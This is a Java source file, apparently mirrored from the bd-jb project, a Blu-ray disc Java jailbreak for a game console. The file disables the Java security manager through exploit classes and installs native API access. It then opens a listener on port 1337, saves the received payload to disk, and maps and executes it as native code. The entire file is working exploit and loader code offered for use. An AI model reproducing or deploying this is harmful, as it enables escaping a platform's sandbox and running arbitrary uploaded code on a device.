mirror of https://github.com/TheOfficialFloW/bd-jb
88 lines
2.3 KiB
Java
88 lines
2.3 KiB
Java
/*
|
|
* Copyright (C) 2021 Andy Nguyen
|
|
*
|
|
* This software may be modified and distributed under the terms
|
|
* of the MIT license. See the LICENSE file for details.
|
|
*/
|
|
|
|
package com.bdjb;
|
|
|
|
import java.io.FileOutputStream;
|
|
import java.io.InputStream;
|
|
import java.io.OutputStream;
|
|
import java.net.Socket;
|
|
import java.net.ServerSocket;
|
|
|
|
class Exploit implements Runnable {
|
|
static void init() {
|
|
Screen.println("[+] bd-jb by theflow");
|
|
|
|
Screen.println("[*] Disabling security manager...");
|
|
|
|
ExploitInterface[] exploits =
|
|
new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
|
|
|
|
for (int i = 0; i < exploits.length; i++) {
|
|
try {
|
|
exploits[i].trigger();
|
|
if (System.getSecurityManager() == null) {
|
|
break;
|
|
}
|
|
} catch (Exception e) {
|
|
continue;
|
|
}
|
|
}
|
|
|
|
if (System.getSecurityManager() != null) {
|
|
Screen.println("[-] Error could not disable security manager.");
|
|
}
|
|
}
|
|
|
|
static void start() {
|
|
new Thread(new Exploit()).start();
|
|
}
|
|
|
|
public void run() {
|
|
if (System.getSecurityManager() != null) {
|
|
return;
|
|
}
|
|
|
|
try {
|
|
Screen.println("[*] Installing native API...");
|
|
API api = API.getInstance();
|
|
|
|
Screen.println("[*] Enabling JIT...");
|
|
JIT jit = JIT.getInstance();
|
|
|
|
Screen.println("[*] Waiting for payload...");
|
|
|
|
ServerSocket serverSocket = new ServerSocket(1337);
|
|
Socket socket = serverSocket.accept();
|
|
|
|
Screen.println("[*] Downloading payload...");
|
|
|
|
InputStream inputStream = socket.getInputStream();
|
|
OutputStream outputStream = new FileOutputStream("/OS/HDD/download0/mnt_ada/payload.bin");
|
|
|
|
byte[] buf = new byte[8192];
|
|
int read;
|
|
while ((read = inputStream.read(buf)) > 0) {
|
|
outputStream.write(buf, 0, read);
|
|
}
|
|
|
|
outputStream.close();
|
|
inputStream.close();
|
|
|
|
socket.close();
|
|
|
|
Screen.println("[*] Executing payload...");
|
|
long sceKernelDlsym = api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym");
|
|
long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin");
|
|
int ret = (int) api.call(payload, sceKernelDlsym);
|
|
Screen.println("[+] Result: " + Integer.toHexString(ret));
|
|
} catch (Exception e) {
|
|
Screen.println("[-] Error: " + e.getCause());
|
|
}
|
|
}
|
|
}
|